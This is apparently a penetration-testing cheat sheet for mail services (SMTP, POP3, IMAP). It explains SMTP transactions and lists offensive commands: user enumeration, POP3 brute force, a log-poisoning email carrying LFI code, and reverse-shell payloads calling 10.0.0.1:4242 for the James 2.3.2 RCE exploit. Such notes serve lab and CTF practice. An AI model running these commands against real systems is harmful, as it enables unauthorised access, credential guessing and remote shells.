SMTP [Port 25]

• SMTP stands for Simple Mail Transfer Protocol.

• It is a TCP/IP protocol that’s used for sending emails.

In order to be able to send emails with SMTP we have to first have to know how mail transactions work:

1. SMTP sessions are initiated after the client opens a TCP/IP connection to the server and the server responds with a greeting (220)

2. The client sends a HELO or EHLO with the clients identity (example: HELO hackertarget.com which means "Hi I'm hackertarget.com")

3. Now the client has to perform 3 steps each separated by a CRLF for a valid SMTP mail transaction:

   • Step 1: MAIL: This tells the server "Hey, we're starting a new email, reset your state". This is where the email "from" is specified.

   • Step 2: RCPT: Tells the server where (who) we want to send the email too.

   • Step 3: DATA: This is where the Subject and body of the email are set, and the client indicates the end of the mail data by a new line containing only ".". This tells the server that the client confirms the email and tells the server to process it and send it.

Banner Grab

telnet 192.168.1.107 25

User Enumeration

• -M: EXPN, VRFY or RCPT

• -U: File of usernames

vrfy raj@domainname

smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107

Email Enumeration

smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t 192.168.1.107

IMAP [Port 143]

#

POP3 [Port 110]

#Banner grabbing
nc -nv 10.11.0.22 110 
telnet 10.10.10.17 110

#Login
user <username>
pass <password>

#Brute-force
nmap -sV --script=pop3-brute <target>

#List messages
list

#Read message number
retr 1

#To send email using STMP for LFI /var/mail/ValidUserHere
EHLO hacker.anything.com
mail from:hacker@domain.com
rcpt to:victimemail@mail.com
data
Subject: email title
<your LFI code here>
<new blank line>

Free Mail Server

• hMailServer [Windows]

James 2.3.2 RCE

• Exploit Link

#Change payload in the script
payload = '/bin/bash -i >& /dev/tcp/10.0.0.1/4242 0>&1' 
payload = 'nc -e /bin/bash 10.0.0.1 4242 &'